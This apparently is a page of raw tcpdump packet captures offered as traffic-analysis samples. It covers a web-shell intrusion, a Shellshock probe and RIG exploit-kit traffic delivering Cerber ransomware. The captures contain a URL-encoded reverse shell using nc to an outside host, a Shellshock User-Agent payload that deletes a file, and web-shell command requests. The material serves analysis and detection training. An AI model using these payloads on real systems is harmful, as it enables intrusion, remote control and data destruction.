2018-10-14 12:34:34.220266 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 996:1295, ack 545, win 2078, options [nop,nop,TS val 738861 ecr 769026434], length 299: HTTP: HTTP/1.1 200 OK
E.._.c@.@…
..d…2.P..{J.,……………
..F–.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

……….+//.MI,I…..@f …
2018-10-14 12:34:34.263625 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [.], ack 1295, win 260, options [nop,nop,TS val 769026448 ecr 738861], length 0
E..4XD@.?……2
..d…P….{J.W…..S…..
-.i…F-
2018-10-14 12:34:37.227759 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 545:772, ack 1295, win 260, options [nop,nop,TS val 769027189 ecr 738861], length 227: HTTP: GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
E…XE@.?……2
..d…P….{J.W….6……
-.lu..F-GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:37.233154 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1295:1662, ack 772, win 2212, options [nop,nop,TS val 739614 ecr 769027189], length 367: HTTP: HTTP/1.1 200 OK
E….d@.@..Y
..d…2.P..{J.W…i…..,…..
..I.-.luHTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:37 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 97
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:52.294903 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1657:1941, ack 2981, win 337, options [nop,nop,TS val 769030955 ecr 742627], length 284: HTTP: GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%
20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
E..PXO@.?……2
..d…P….{J…..Q…….
-.{+..T.GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:52.307291 IP 10.1.2.100.45298 > 192.0.2.50.443: Flags [S], seq 3484359733, win 14600, options [mss 1460,sackOK,TS val 743383 ecr 0,nop,wscale 3], length 0
E.. 10.1.2.100.45298: Flags [R.], seq 0, ack 3484359734, win 0, length 0
E..(..@.?..H…2
..d………..6P…B………
2018-10-14 12:34:52.309383 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 2981:3271, ack 1941, win 2882, options [nop,nop,TS val 743383 ecr 769030955], length 290: HTTP: HTTP/1.1 200 OK
E..V.i@.@…
..d…2.P..{J………B…….
..W.-.{+HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:52 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:54:51.821265 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 1:40, ack 1, win 1825, length 39
E..O..@.@.+5
..d
..d…D….g…P..!….SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1

2018-10-14 12:54:51.827631 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1:497, ack 40, win 256, length 496
E…#.@…..
..d
..d.D..g…….P….5..SSH-2.0-PuTTY_Release_0.70
…L…U.4|..m..u~……..curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1…Wssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly
2018-10-14 12:54:51.827650 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 497:1133, ack 40, win 256, length 636
E…#.@…..
..d
..d.D..g…….P…s…1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com… none,zlib… none,zlib……………..
2018-10-14 12:54:51.827709 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 497, win 1959, length 0
E..(..@.@.+[
..d
..d…D….g…P…….
2018-10-14 12:54:51.827744 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 1133, win 2118, length 0
E..(..@.@.+Z
..d
..d…D….g..-P..F….
2018-10-14 12:54:51.828554 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 40:1024, ack 1133, win 2118, length 984
E…..@.@.’.
..d
..d…D….g..-P..F…….. ..*3.3…p.V#.$……ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1…#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….none,zlib@openssh.com….none,zlib@openssh.com………………….
2018-10-14 12:54:51.839985 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1133:1213, ack 1024, win 252, length 80
E..x#.@…..
..d
..d.D..g..-..”.P….R…..L…..A……E……E0

ShellShock Attack PCAP file Download Traffic Analysis Sample

2017-07-26 16:42:16.277036 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 15800207:15800243, ack 1402349435, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 36: HTTP: GET /cgi-bin/.svn/entries HTTP/1.1
E..X.+@.>.|….x.O…..P….S.'{…s…….
Fu..z.<.GET /cgi-bin/.svn/entries HTTP/1.1

2017-07-26 16:42:16.277047 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 36:148, ack 1, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 112: HTTP
E….,@.>.|….x.O…..P….S.'{…s.…..
Fu..z.<.Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu
User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271

2017-07-26 16:42:16.277082 IP 61.7.186.197.5507 > 130.253.185.203.23: Flags [S], seq 0, win 65535, length 0
E..(:(….W.=……………….P…e…
2017-07-26 16:42:16.277466 IP 60.196.157.234.47651 > 130.253.130.165.1900: UDP, length 94
E..z..@.0.j”<……..#.l.f..M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: ssdp:discover
MX: 10
ST: ssdp:all

.
2017-07-26 16:42:16.282511 IP 91.223.133.13.42880 > 130.253.95.133.3404: Flags [S], seq 670678803, win 1024, length 0
E(.(…….^[…..….L’…….P…L… 2017-07-26 16:42:16.282575 IP 91.223.133.13.42880 > 130.253.95.125.3404: Flags [S], seq 2388976086, win 1024, length 0 E(.(……RY[…..}…L.d……P….s..
2017-07-26 16:42:16.282695 IP 213.49.124.141.50470 > 130.253.126.22.81: Flags [S], seq 3098327735, win 14600, options [mss 1452,sackOK,TS val 9607180 ecr 0,nop,wscale 1], length 0
E .<.4@.5….1|…~..&.Q……….9………… ………… 2017-07-26 16:42:16.283075 IP 74.94.22.81.64396 > 130.253.68.156.23: Flags [S], seq 2197636252, win 40676, length 0
E .(.p..6…J^.Q..D…….D…..P…%x..
2017-07-26 16:42:16.287606 IP 74.109.122.3.37142 > 130.253.119.199.23: Flags [S], seq 2197649351, win 2461, options [mss 1460], length 0
E..,.8..5..Jmz…w…….w…..`. .Cb…… 2017-07-26 16:42:16.288426 IP 114.230.11.31.35388 > 130.253.49.6.23: Flags [S], seq 2197631238, win 38956, length 0 E..(….1…r…..1..<….1…..P..,.V.. 2017-07-26 16:42:16.291979 IP 119.193.140.179.2420 > 130.253.232.246.22: Flags [S], seq 2197678326, win 1067, length 0 E..(….0…w……. t……….P..+…. 2017-07-26 16:42:16.293510 IP 77.72.82.14.42775 > 130.253.225.5.3344: Flags [S], seq 1899387472, win 1024, length 0 E..(.E…..1MHR………q6ZP….P…(… 2017-07-26 16:42:16.294581 IP 77.72.82.14.42775 > 130.253.57.86.3307: Flags [S], seq 2659645233, win 1024, length 0 E..(……..MHR…9V…….1….P….~.. 2017-07-26 16:42:16.296551 IP 123.188.246.124.42492 > 130.253.123.118.23: Flags [S], seq 2197650294, win 48868, length 0 E..(….1.*.{..|..{v……{v….P……. 2017-07-26 16:42:16.297055 IP 115.148.242.216.17414 > 130.253.215.62.29917: Flags [S], seq 4072809910, win 65535, options [mss 1452,nop,wscale 2,nop,nop,sackOK], length 0 E..4,^@….s……>D.t…%…………………….
2017-07-26 16:42:16.300902 IP 185.195.201.148.32512 > 130.253.123.83.1900: Flags [S], seq 0, win 65535, length 0
E(.(.a@.4………{S…l……..P…….
2017-07-26 16:42:16.301542 IP 218.76.253.134.30694 > 130.253.215.62.30208: UDP, length 31
E..;.S..p..P.L…..>w.v..”l……0
……a…………….

RIG Exploit Kit EK Delivers Cerber Ransomware Malware PCAP file download traffic sample

2016-10-18 14:40:36.304404 IP 10.10.18.102.49185 > 195.133.201.132.80: Flags [P.], seq 1:477, ack 1, win 258, length 476: HTTP: GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
E….O@…N+

.f…..!.P0.X.]..MP…….GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: http://www.basket-brabant.be/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: add.jamesthorpebourbon.com
Connection: Keep-Alive

2016-10-18 14:40:36.504124 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], ack 477, win 237, length 0
E..(.T@.5…….

.f.P.!]..M0.Z.P…E+..
2016-10-18 14:40:37.014717 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], seq 1:1322, ack 477, win 237, length 1321: HTTP: HTTP/1.1 200 OK
E..Q.U@.5…….

.f.P.!]..M0.Z.P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Tue, 18 Oct 2016 18:40:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 18876
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2016-10-18 14:41:31.393471 IP 10.10.18.102.54101 > 31.184.234.169.6892: UDP, length 9
E..%.^……

.f…..U…..Xhi008c1c4………
2016-10-18 14:41:31.393481 IP 10.10.18.102.54101 > 31.184.234.170.6892: UDP, length 9
E..%._……

.f…..U…..Whi008c1c4………
2016-10-18 14:41:31.393494 IP 10.10.18.102.54101 > 31.184.234.171.6892: UDP, length 9
E..%.`……

.f…..U…..Vhi008c1c4………
2016-10-18 14:41:31.393504 IP 10.10.18.102.54101 > 31.184.234.172.6892: UDP, length 9
E..%.a……

.f…..U…..Uhi008c1c4………
2016-10-18 14:41:31.393514 IP 10.10.18.102.54101 > 31.184.234.173.6892: UDP, length 9
E..%.b……

.f…..U…..Thi008c1c4………
2016-10-18 14:41:31.393524 IP 10.10.18.102.54101 > 31.184.234.174.6892: UDP, length 9
E..%.c……

.f…..U…..Shi008c1c4………
2016-10-18 14:41:31.393534 IP 10.10.18.102.54101 > 31.184.234.175.6892: UDP, length 9
E..%.d……

.f…..U…..Rhi008c1c4………
2016-10-18 14:41:31.393544 IP 10.10.18.102.54101 > 31.184.234.176.6892: UDP, length 9
E..%.e……

.f…..U…..Qhi008c1c4………
2016-10-18 14:41:31.393554 IP 10.10.18.102.54101 > 31.184.234.177.6892: UDP, length 9
E..%.f……

.f…..U…..Phi008c1c4………
2016-10-18 14:41:31.393565 IP 10.10.18.102.54101 > 31.184.234.178.6892: UDP, length 9
E..%.g……

.f…..U…..Ohi008c1c4………
2016-10-18 14:41:31.393575 IP 10.10.18.102.54101 > 31.184.234.179.6892: UDP, length 9
E..%.h……

.f…..U…..Nhi008c1c4………
2016-10-18 14:41:31.393585 IP 10.10.18.102.54101 > 31.184.234.180.6892: UDP, length 9
E..%.i……

.f…..U…..Mhi008c1c4………
2016-10-18 14:41:31.393598 IP 10.10.18.102.54101 > 31.184.234.181.6892: UDP, length 9
E..%.j……

.f…..U…..Lhi008c1c4………
2016-10-18 14:41:31.393608 IP 10.10.18.102.54101 > 31.184.234.182.6892: UDP, length 9
E..%.k……

.f…..U…..Khi008c1c4………
2016-10-18 14:41:31.393618 IP 10.10.18.102.54101 > 31.184.234.183.6892: UDP, length 9
E..%.l…..}

.f…..U…..Jhi008c1c4………
2016-10-18 14:41:31.393628 IP 10.10.18.102.54101 > 31.184.234.184.6892: UDP, length 9
E..%.m…..{